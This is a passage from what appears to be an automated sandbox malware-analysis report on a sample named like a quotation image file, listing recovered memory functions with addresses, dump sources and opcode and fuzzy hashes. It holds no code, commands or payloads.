                          • Instruction Fuzzy Hash: 1CF0B274E04228DFEB64CF28D888BD9B7B1FB4A301F4080E5E409A7285DB789E84DF51
                          Function 06546E65 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6363118a37a13c9c2709e114b97bfe3d43cc2215ccd441f2782ece3bf0c05d7f
                          • Instruction ID: 44bee47fc2807e711e7584e9a1e7e1cf7e41046e696852da14547a8ba66f2dbc
                          • Opcode Fuzzy Hash: 6363118a37a13c9c2709e114b97bfe3d43cc2215ccd441f2782ece3bf0c05d7f
                          • Instruction Fuzzy Hash: 52F02D74940669CFDBA4DF68E98879CBBB1FB09305F1040D6E509A7250DB745DC4CF25
                          Function 0654DC30 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6b361b50576479c15c3e1cef8f9fc431643a5cc49f5a7b13d2a2b89470aa0ba
                          • Instruction ID: 6b667d2b66ae04436d3bac603e4418dcabbd990bf536d3dd7c19288e30bf10e3
                          • Opcode Fuzzy Hash: d6b361b50576479c15c3e1cef8f9fc431643a5cc49f5a7b13d2a2b89470aa0ba
                          • Instruction Fuzzy Hash: 78E026307003208BEAE079A04C41B1133E4AF89748F1005AD9A055F6C0DAB2D801C751
                          Function 0684BE30 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 039cf9c1fa620d2e8963a7c56f7fe5015e0daa03c849961ffd82f9074140421e
                          • Instruction ID: c2e3a0d2a54f99bd8e82f5567dbc50b1cb8ad8c5101f5ce316bf87af020609c2
                          • Opcode Fuzzy Hash: 039cf9c1fa620d2e8963a7c56f7fe5015e0daa03c849961ffd82f9074140421e
                          • Instruction Fuzzy Hash: 1AE0C974D0520CEFCB84DFA8D585A9DFBF4EB88310F10C1A9991893341D6759A51DF80
                          Function 06845278 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 039cf9c1fa620d2e8963a7c56f7fe5015e0daa03c849961ffd82f9074140421e
                          • Instruction ID: f9785b73d74b082723bb121c6e3e975b8cd51c57d74ab4e914e05ed078016e4e
                          • Opcode Fuzzy Hash: 039cf9c1fa620d2e8963a7c56f7fe5015e0daa03c849961ffd82f9074140421e
                          • Instruction Fuzzy Hash: 53E0C974E0520CEFCB94DFA8D545A9CBBF4EB49314F10C1AA980893340D6359A51DF81
                          Function 06849560 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 039cf9c1fa620d2e8963a7c56f7fe5015e0daa03c849961ffd82f9074140421e
                          • Instruction ID: b0afe30853f6946eb00f8c123cb401cd8a4c7ce60915105a8ed98a623f448eb5
                          • Opcode Fuzzy Hash: 039cf9c1fa620d2e8963a7c56f7fe5015e0daa03c849961ffd82f9074140421e
                          • Instruction Fuzzy Hash: D1E0C974D0520CEFCB94DFA8D545A9DBBF4EB48311F10C1A9D85993340D6359B51DF80
                          Function 065B0BC8 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e23e95fbeb7118179945b171fa7850f6ff4613e29a91716198b50ab5e326d105
                          • Instruction ID: c5f25c0976f83bf9ad8c3f72ed0ea73387fbd180f0e229c2c448ef707a6ff7c4
                          • Opcode Fuzzy Hash: e23e95fbeb7118179945b171fa7850f6ff4613e29a91716198b50ab5e326d105
                          • Instruction Fuzzy Hash: 5CF03234809208EFCB81CF98D840AADBBB5FB48310F10C4AAEC5856391C6329A21EF80
                          Function 06507398 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c3ea78cc0fc0ffb98808ffdd47c5d4958c88525e6db0337e62a1b76da069868e
                          • Instruction ID: 103964c753194315f96e325f90e148e44f232424be748d9cb41f40967fc67733
                          • Opcode Fuzzy Hash: c3ea78cc0fc0ffb98808ffdd47c5d4958c88525e6db0337e62a1b76da069868e
                          • Instruction Fuzzy Hash: 77E06570D0A348EFD781EFB8D44569CBFB4AB1A204F2000FAC8049A290E235DA80CB92
                          Function 06509810 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3de898b306bfa7ed5abac5fba9025b2a04d6516000ad2cede8329e6d1615fb8f
                          • Instruction ID: c230fb018eba1d4ef4ddb0599eaf3b9e76b371bf83d5c26dbfbb09ccaf244604
                          • Opcode Fuzzy Hash: 3de898b306bfa7ed5abac5fba9025b2a04d6516000ad2cede8329e6d1615fb8f
                          • Instruction Fuzzy Hash: C7E09A30A0E248EFCB54DBA4E8449A8BF71AF47304F1491EEDC485B392C2728A46DB80
                          Function 06503808 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a8e358db788a98cb03f881be624c5f1cb80dc3c0f9a04cd001e0e44de75604a6
                          • Instruction ID: 939c053b813a4d2efd3c3f0e69a38b2c6a082e78ed012ec567f463222aee950e
                          • Opcode Fuzzy Hash: a8e358db788a98cb03f881be624c5f1cb80dc3c0f9a04cd001e0e44de75604a6
                          • Instruction Fuzzy Hash: CCE08679006381BFEB165B10D8149BA7B29FB85341734806AF5858B152C632DC13DBA1
                          Function 01410A33 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 49839dbdc275d75c366120650f962559810d4c8df118e648e6019fdc208136bc
                          • Instruction ID: f5be4a62d0c1b1b78163dfceb4ae1c3aecbbc61822a66294eec71bfaf0112230
                          • Opcode Fuzzy Hash: 49839dbdc275d75c366120650f962559810d4c8df118e648e6019fdc208136bc
                          • Instruction Fuzzy Hash: 6AE01271A50119CFCB14FF6595683BD7AB2AF98351F20046EE006F7359DF740E8187A6
                          Function 06547E98 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bcbef5b5c070f1d5bb8d067e235cf4b6d6aea2327262049df2a26c0a2debe4cf
                          • Instruction ID: be967abf057565c1dbc68940789a22db9eccb9f915b42669f7ab8e2060f60128
                          • Opcode Fuzzy Hash: bcbef5b5c070f1d5bb8d067e235cf4b6d6aea2327262049df2a26c0a2debe4cf
                          • Instruction Fuzzy Hash: 9DE0C274E05208EFCB94EFA8D5846ACBBF4EB48204F10C1AAD80893340D7359A16DF90
                          Function 06548DA0 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bcbef5b5c070f1d5bb8d067e235cf4b6d6aea2327262049df2a26c0a2debe4cf
                          • Instruction ID: 3493675d5430c39fd55a18c031c5011e4b84d02ef9e8de6bd57116a1f4114a08
                          • Opcode Fuzzy Hash: bcbef5b5c070f1d5bb8d067e235cf4b6d6aea2327262049df2a26c0a2debe4cf
                          • Instruction Fuzzy Hash: 03E0E574E06208EFCB84EFA8D5446ACBBF4FB48304F10C5EA981893340D6359A01DF80
                          Function 0684C780 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b5c73e3a1323ad2335ab5fc8f540e01710094e2769e893809719ab4c52ee970
                          • Instruction ID: 9f6dc55d0f2fcba1f4cf98e1cd1184d23f34b78321972d1bf4f35d0b332e574a
                          • Opcode Fuzzy Hash: 3b5c73e3a1323ad2335ab5fc8f540e01710094e2769e893809719ab4c52ee970
                          • Instruction Fuzzy Hash: BFE0E574E0A20CEFCB94EFA8D5456ACBBF8EB88304F10C1A99818D3340D7359A01DF80
                          Function 0650BADF Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: effed11bc1b1d6fd155eaa31239b104133123ba9d7722f2deb228321c8e67536
                          • Instruction ID: 4c3bdcd61e000c6422d2ac5aff2f0d457488415c41a30a98845addf546a6e735
                          • Opcode Fuzzy Hash: effed11bc1b1d6fd155eaa31239b104133123ba9d7722f2deb228321c8e67536
                          • Instruction Fuzzy Hash: E8E0E574D05208EFCB84CFA8D581AECBFF4EB89310F20C1AAE85997341C6729A41DF80
                          Function 0650BAE0 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0ff89e5a362cd8a3436b4c55b8e040132282e338281c4282fb50ecffbd1efe81
                          • Instruction ID: 24a4242b36303bcce95a6569299a0433a872fcb41f0c076e3cf003074cd378f1
                          • Opcode Fuzzy Hash: 0ff89e5a362cd8a3436b4c55b8e040132282e338281c4282fb50ecffbd1efe81
                          • Instruction Fuzzy Hash: F1E0E574D05108AFCB84DF99D581AECBBB8AB48300F20C1AAA85897381C6729A41DF90
                          Function 06509FA0 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e3aa85ba72086c757a318bac15b8f58107e946d3ee746f940459e1973495b4ca
                          • Instruction ID: 3b2b195e9bc3b179a32dc47a40ae519a89e1c610a3dbf840db849635d8f798c5
                          • Opcode Fuzzy Hash: e3aa85ba72086c757a318bac15b8f58107e946d3ee746f940459e1973495b4ca
                          • Instruction Fuzzy Hash: 16E01A74E05208EFCB84DFA8D5446ACFBF8FB48300F10C5A9A81893345D635DA01DF80
                          Function 06546598 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: faba1c36e857433ca5dfbf18c142f56d70d92af575188f241ab482f076b362d0
                          • Instruction ID: 3b441587cab619e00982105e0e275dfa85701d6b3b307773d6ecf5dc12c764cc
                          • Opcode Fuzzy Hash: faba1c36e857433ca5dfbf18c142f56d70d92af575188f241ab482f076b362d0
                          • Instruction Fuzzy Hash: B6E012B0D06208EFCB94EFA8D4486ACBBB5FF4A304F5081E9D808A3304D6349A40DF80
                          Function 065472F8 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a96cfb6b0d4b7ae37243928bbae41031abe9c0e924e4efdda102dd669374084
                          • Instruction ID: 5d652705b0710f1be21cb03b148cd56007e88c8b8e55a6a2e8c6c82f9f9ca57e
                          • Opcode Fuzzy Hash: 5a96cfb6b0d4b7ae37243928bbae41031abe9c0e924e4efdda102dd669374084
                          • Instruction Fuzzy Hash: 36F052386053189FCB909F28C89879CBBB1FF4A308F2080E9D00AA7256CE3819888F01
                          Function 0684EDF0 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc832189e32d4b950a7e59dffa4bbb5df591cfcd81bb3e11d499eb1fecae19e2
                          • Instruction ID: 2e44fdd00ac07edcc2f02e36c2745633500b6012f00a37f76cf2d0dd7d0eb6cb
                          • Opcode Fuzzy Hash: cc832189e32d4b950a7e59dffa4bbb5df591cfcd81bb3e11d499eb1fecae19e2
                          • Instruction Fuzzy Hash: A4E0267480910CEFC740DFA4D4889ACBFB8AB45300F10C0A9E84897340C631DA01EBD0
                          Function 06503870 Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 57449ef6804689a2df6533962bd225a664f2e6a854239c230907032802ebf361
                          • Instruction ID: 07011df34862c5fb860b415e4d4c603027e860ff83ca9acac5a9c7cebaecc819
                          • Opcode Fuzzy Hash: 57449ef6804689a2df6533962bd225a664f2e6a854239c230907032802ebf361
                          • Instruction Fuzzy Hash: 55D0A7350193887FD6010610DC07CB37F2DC7571003018087F2C6850138A216C1387F1
                          Function 06546C6D Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b141046b03f8df6c2e14d8832491b494d21b9b1bfbc206160f453e44c92183b4
                          • Instruction ID: c5526fff5aa82312b5e0a5d76638a5744630fe3730b185f13a62381e5992d435
                          • Opcode Fuzzy Hash: b141046b03f8df6c2e14d8832491b494d21b9b1bfbc206160f453e44c92183b4
                          • Instruction Fuzzy Hash: C2F0C974A18228DFCB54EF98E8847ADB772FB8A314F5045D6E04AB7244CB385EC48F25
                          Function 06546CC0 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fd1d1e3560dbbc9ef4b01a303be3a1e1ce0c6913f2c73e2c388d531e1edd87db
                          • Instruction ID: 7451db886a4826b70619d787cb7460253df168399732b46ffbc3d251cbd03e09
                          • Opcode Fuzzy Hash: fd1d1e3560dbbc9ef4b01a303be3a1e1ce0c6913f2c73e2c388d531e1edd87db
                          • Instruction Fuzzy Hash: 87F039B4A10124DBCB10EF58EA8869C77B1FB9A300F0040DAE249A7244CB785EC4CF55
                          Function 06546D16 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b07c521ffa763eea1c29d632ff6383a91e91622736b067648874b035c2f5ce95
                          • Instruction ID: 401313860c4130d6801c778cb200115d040262b13d1ed8c68028cbcf14c78f32
                          • Opcode Fuzzy Hash: b07c521ffa763eea1c29d632ff6383a91e91622736b067648874b035c2f5ce95
                          • Instruction Fuzzy Hash: CDF01CB4A102299FDB25DF18E844BADB7B1FB89300F0086A5E40AA7348D7745D81CF50
                          Function 06547810 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1d0e41dfb5fac8e5634f516276522193fc05cb7df44e36546aa06d2fb9fabb17
                          • Instruction ID: 8070e75e8dba9a4144f5d6e943a6c27f2bb012d462dabbbd7050ebe874bc2dc0
                          • Opcode Fuzzy Hash: 1d0e41dfb5fac8e5634f516276522193fc05cb7df44e36546aa06d2fb9fabb17
                          • Instruction Fuzzy Hash: 9BE0B674D05208EFCB84EFA8D9856ACBBF4AB48215F2085E9D80897341E7719A45DB81
                          Function 0684EA28 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 71ecebb551222ee581074e67dff2be814b207c0a065521dbaef9d924931e0d91
                          • Instruction ID: e200e3cb3fdf12c9c21b72a8b77ba7994933b10939176d3d3feb7840d436cb02
                          • Opcode Fuzzy Hash: 71ecebb551222ee581074e67dff2be814b207c0a065521dbaef9d924931e0d91
                          • Instruction Fuzzy Hash: 94E01A34D0510CAFCB84DF98D5455ACBBB4BF48204F14C1E99848A7341D6359A41DB80
                          Function 06847E50 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 71ecebb551222ee581074e67dff2be814b207c0a065521dbaef9d924931e0d91
                          • Instruction ID: 47f7152ec9a5ed22a61f0e10c506d85e296fb108f93e50aef980a836a6fe2fef
                          • Opcode Fuzzy Hash: 71ecebb551222ee581074e67dff2be814b207c0a065521dbaef9d924931e0d91
                          • Instruction Fuzzy Hash: 4FE01A34D0510CAFCB94DB98D5815ACBBB4AB48204F1081A9D85897341D735AE01DB80
                          Function 065076A8 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7483493a664f2149d36610211b066de77dd755e073e85f285e6dd40be144c790
                          • Instruction ID: 1c71f15ec53439b959e188ad3a3c271080e16bd78702e29eb3ebeff6b0a068e9
                          • Opcode Fuzzy Hash: 7483493a664f2149d36610211b066de77dd755e073e85f285e6dd40be144c790
                          • Instruction Fuzzy Hash: D6E01A34D05108AFCB84DFA8D5505ACBBB4AB48204F1081A9984957391C635AA01DF80
                          Function 0650F700 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 41539ec04019f9009e4b586ff90354bcf6359ec3c44392e50eee1baa43c343d8
                          • Instruction ID: 17de4d8800a46b37c01f3db7fe9743c761d1f1c16d50a213d00743f0f763ef32
                          • Opcode Fuzzy Hash: 41539ec04019f9009e4b586ff90354bcf6359ec3c44392e50eee1baa43c343d8
                          • Instruction Fuzzy Hash: 7EE08C3490A208EBDB54DFA8E9809ACBBB4FB45310F14C1A9EC0527381C632DE56EF81
                          Function 0650E168 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9e33a74886f136d26bfdea6205e120919f5006081de38f258d8063a1eb9bd35a
                          • Instruction ID: 56023410d3c8e1a7dcb8bcc66d605d7647bffa67b824ea11f22f2cc47cf40bc8
                          • Opcode Fuzzy Hash: 9e33a74886f136d26bfdea6205e120919f5006081de38f258d8063a1eb9bd35a
                          • Instruction Fuzzy Hash: C7E0E674D05108EFD7C4DFA8D54569CBBF4EB48215F2085E99808D7381D671DE41DB81
                          Function 01411D50 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f7245e0340ef967dc06831b8663cf3072f6f4a298f5ed5e7a0cd4fc321b4d23
                          • Instruction ID: feb1c66f82caa2f2a3409676409b522da371b8483cbf23d66093a8a18d850e75
                          • Opcode Fuzzy Hash: 6f7245e0340ef967dc06831b8663cf3072f6f4a298f5ed5e7a0cd4fc321b4d23
                          • Instruction Fuzzy Hash: 76E0DFB0A08208AFCB02DFA8EC4185DBBB8FB0520471009EEE404D7202EA355F40CB80
                          Function 06546618 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3dccabd229b1b2462e87a16cb37a28c3e303b2684f3ce72535c606e144491c67
                          • Instruction ID: 54ae6a0427b20f37bcaa18e37c355977b325f32b789ca26673d40c9576f0348e
                          • Opcode Fuzzy Hash: 3dccabd229b1b2462e87a16cb37a28c3e303b2684f3ce72535c606e144491c67
                          • Instruction Fuzzy Hash: F6E0EC70D16208DFCB90EFA8E549A9CBBB8AB05215F1045E9984993344E7705A80DB41
                          Function 0684CEF8 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b95ff2c730d3f00f9ae7dbc22af5bd231e259848e4de3bf46701990f2ba2793d
                          • Instruction ID: 91f95722b25860c92c633a0d11e1862d06c914a22182c84900b276a41c5cd36c
                          • Opcode Fuzzy Hash: b95ff2c730d3f00f9ae7dbc22af5bd231e259848e4de3bf46701990f2ba2793d
                          • Instruction Fuzzy Hash: 84E0123490B10CDBCB44EFD4E5459ACBBB8EB45315F1091ADD80857341CBB5AE42DB81
                          Function 065B1F50 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112321769.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_65b0000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f5bfe822cfb11a3d976d48a3e526f73a0c45e42946d4cca1c4cf5736f4fe9a35
                          • Instruction ID: d12fb634a6a6ef5fd853bf48448760ebb1439ef1652ff981820e8d44e769293f
                          • Opcode Fuzzy Hash: f5bfe822cfb11a3d976d48a3e526f73a0c45e42946d4cca1c4cf5736f4fe9a35
                          • Instruction Fuzzy Hash: 42E0C234D09108DBCB94DF94E5409ACBBB4FB45300F1091A8D80817341C7319E02DB90
                          Function 065073A8 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
